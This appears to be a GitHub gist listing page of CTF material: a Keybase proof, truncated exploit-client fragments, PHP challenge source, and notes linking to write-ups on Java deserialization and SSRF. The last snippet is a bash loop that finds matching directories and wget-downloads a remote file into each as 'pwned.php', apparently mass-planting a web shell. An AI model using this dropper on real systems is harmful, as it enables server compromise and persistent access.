I hereby claim:
-
I am ducnhse130201 on github.
-
I am peterjson (https://keybase.io/peterjson) on keybase.
-
I have a public key ASBDaPh8oTicwrM-m7Nb3Nb2zQPR9QaDo9c-ggglX8reQgo
from telnetlib import * | |
from hashlib import * | |
def write(data): | |
r.read_until('0) quit') | |
r.write("1\n") | |
r.read_until("Data? (In hex format)") | |
r.write(data + "\n") | |
def read(): |
I hereby claim:
I am ducnhse130201 on github.
I am peterjson (https://keybase.io/peterjson) on keybase.
I have a public key ASBDaPh8oTicwrM-m7Nb3Nb2zQPR9QaDo9c-ggglX8reQgo
import requests | |
import binascii | |
from base64 import * | |
def xor(data, key): | |
from itertools import izip, cycle | |
xored = ''.join(chr(ord(x) ^ ord(y)) for (x, y) in izip(data, cycle(key))) | |
return xored |
<?php | |
session_start(); | |
include "config.php"; | |
if(isset($_GET['debug'])) | |
{ | |
show_source(__FILE__); | |
die("..."); | |
} | |
if(!isset($_SESSION['token'])) |
<?php | |
session_start(); | |
include "config.php"; | |
if(isset($_GET['debug'])) | |
{ | |
show_source(__FILE__); | |
die("..."); | |
} | |
if(!isset($_SESSION['token'])) |
package com.company; | |
import java.io.*; | |
import java.net.MalformedURLException; | |
import java.net.URL; | |
import java.nio.file.Files; | |
import java.nio.file.Path; | |
import java.nio.file.Paths; | |
import java.util.List; | |
import java.util.jar.Attributes; |
--- some notes about mates ctf 2018 round 5(wutfaces) --- | |
[+] as always read carefully and understand from original write-ups from author blog | |
[+] https://web.archive.org/web/20190501081457/https://tint0.com/matesctf-2018-wutfaces-cve-2013-2165/ | |
[+] https://web.archive.org/web/20190501081357/https://tint0.com/when-el-injection-meets-java-deserialization/ | |
[+] Things you need to do if you want to understand | |
[+] get source and code review | |
[+] debug if needed | |
[+] and practice makes perfect |
[+] web3 whitehat_final short write-up [+] | |
[+] Read this first (write-up from author): https://medium.com/nightst0rm/writeup-web03-whitehat-grand-prix-2018-java-ssrf-java-deserialization-to-sql-injection-c20b211ddd91 | |
[+] download this: https://docs.google.com/document/d/1VGLVi63DfIsopJSZJCFNDgz_2wPReAuvLNhDKR9JMH8/ and try to understand the code | |
[+] debug if you stuck somewhere or you can contact me :> | |
[+] If you want to rebuild the challenge contact me and i will give you source code |
#!/bin/bash | |
# ./remote server port 'menu string' | |
touch "$1" || (echo "Cannot create file named $1" && exit 1) | |
exec > "$1" | |
echo 'from pwn import *' | |
echo '' | |
echo -e "HOST, PORT = \"$2\", \"$3\"" | |
if [ ! -n "$HOST" ]; then HOST=0.0.0.0; fi |
OUTPUT="$(find / -type f -name $1 2>&1 | grep -v "Permission denied" | sed 's/'$1'//g')" | |
while IFS= read | |
do | |
value="${REPLY}pwned.php" | |
wget $2 -O $value | |
done <<< "$OUTPUT" | |